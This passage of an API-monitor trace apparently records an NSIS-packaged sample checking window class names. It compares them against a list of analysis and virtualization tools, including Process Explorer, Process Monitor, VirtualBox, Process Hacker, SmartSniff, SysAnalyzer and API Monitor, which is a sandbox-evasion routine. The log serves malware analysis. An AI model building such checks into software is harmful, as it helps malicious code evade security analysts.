lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.519] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.519] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.519] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetWindowText(p r1, t.r2, i1024)", iMaxLength=1024 | out: lpString1="user32::GetWindowText(p r1, t.r2, i1024)") returned="user32::GetWindowText(p r1, t.r2, i1024)" [0158.519] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.519] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.520] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.520] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.520] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.520] lstrcpyA (in: lpString1=0x341200, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.520] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.520] lstrcpyA (in: lpString1=0x327e20, lpString2="GetWindowText" | out: lpString1="GetWindowText") returned="GetWindowText" [0158.520] lstrcpynA (in: lpString1=0x341200, lpString2="65668", iMaxLength=1024 | out: lpString1="65668") returned="65668" [0158.520] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.520] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.520] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.520] GetWindowTextA (in: hWnd=0x10084, lpString=0x3401e0, nMaxCount=1024 | out: lpString="") returned 0 [0158.520] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="1024") returned 4 [0158.520] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.520] lstrcpyA (in: lpString1=0x430800, lpString2="" | out: lpString1="") returned="" [0158.520] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="65668") returned 5 [0158.520] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.520] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.521] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.521] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.521] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.521] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.521] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.521] lstrcpynA (in: lpString1=0x33723c, lpString2="user32::GetClassName(p r1, t.r3, i1024)", iMaxLength=1024 | out: lpString1="user32::GetClassName(p r1, t.r3, i1024)") returned="user32::GetClassName(p r1, t.r3, i1024)" [0158.521] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.521] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.521] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.521] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.521] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.521] lstrcpyA (in: lpString1=0x3401e0, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.521] lstrcpyA (in: lpString1=0x327a20, lpString2="user32" | out: lpString1="user32") returned="user32" [0158.521] lstrcpyA (in: lpString1=0x327e20, lpString2="GetClassName" | out: lpString1="GetClassName") returned="GetClassName" [0158.521] lstrcpynA (in: lpString1=0x3401e0, lpString2="65668", iMaxLength=1024 | out: lpString1="65668") returned="65668" [0158.521] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.521] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.522] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.522] GetClassNameA (in: hWnd=0x10084, lpClassName=0x340df8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0158.522] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0158.522] lstrcpynA (in: lpString1=0x341200, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpyA (in: lpString1=0x430c00, lpString2="tooltips_class32" | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65668") returned 5 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.522] lstrlenA (lpString="0") returned 1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCEXPL") returned 1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="PROCMON_WINDOW_CLASS") returned 1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="VBoxTrayToolWndClass") returned -1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessLasso_Notification_Class") returned 1 [0158.522] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrlenA (lpString="tooltips_class32") returned 16 [0158.522] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.522] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.522] lstrcmpiA (lpString1="tooltips_class32", lpString2="SmartSniff") returned 1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrlenA (lpString="tooltips_class32") returned 16 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.523] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrlenA (lpString="tooltips_class32") returned 16 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.523] lstrcmpiA (lpString1="tooltips_class32", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrlenA (lpString="tooltips_class32") returned 16 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.523] lstrcmpiA (lpString1="tooltips_class32", lpString2="SysAnalyzer") returned 1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrlenA (lpString="tooltips_class32") returned 16 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.523] lstrcmpiA (lpString1="tooltips_class32", lpString2="VMSwitchUserControlClass") returned -1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrlenA (lpString="tooltips_class32") returned 16 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="tooltips_class32", iMaxLength=1024 | out: lpString1="tooltips_class32") returned="tooltips_class32" [0158.523] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.523] lstrcmpiA (lpString1="tooltips_class32", lpString2="ProcessHacker") returned 1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.523] lstrlenA (lpString="") returned 0 [0158.523] lstrcpynA (in: lpString1=0x40ac18, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.523] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.523] lstrcmpiA (lpString1="", lpString2="0") returned -1 [0158.523] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrlenA (lpString="") returned 0 [0158.524] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.524] lstrlenA (lpString="3399936") returned 7 [0158.524] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.524] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.524] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.524] lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.524] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.524] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.524] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrlenA (lpString="") returned 0 [0158.524] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrlenA (lpString="") returned 0 [0158.524] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrlenA (lpString="") returned 0 [0158.524] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.524] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.524] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.524] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.524] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.524] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.524] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.525] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.525] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.525] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.525] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.525] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.525] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.525] lstrcpyA (in: lpString1=0x340df8, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.525] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.525] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.525] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.525] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.525] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.525] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.525] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.525] strstr (_Str="", _SubStr="- main thread") returned 0x0 [0158.526] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.526] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] wsprintfA (in: param_1=0x340df8, param_2="%d" | out: param_1="0") returned 1 [0158.526] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.526] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.526] lstrlenA (lpString="0") returned 1 [0158.526] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.526] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.526] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.526] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.526] lstrlenA (lpString="0") returned 1 [0158.526] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] lstrlenA (lpString="") returned 0 [0158.526] lstrcpynA (in: lpString1=0x33723c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.526] lstrcpynA (in: lpString1=0x337684, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.526] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrlenA (lpString="3399936") returned 7 [0158.526] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.526] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.526] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.526] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.527] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.527] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrlenA (lpString="") returned 0 [0158.527] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x40a418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrlenA (lpString="") returned 0 [0158.527] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrlenA (lpString="") returned 0 [0158.527] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.527] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.527] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.527] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 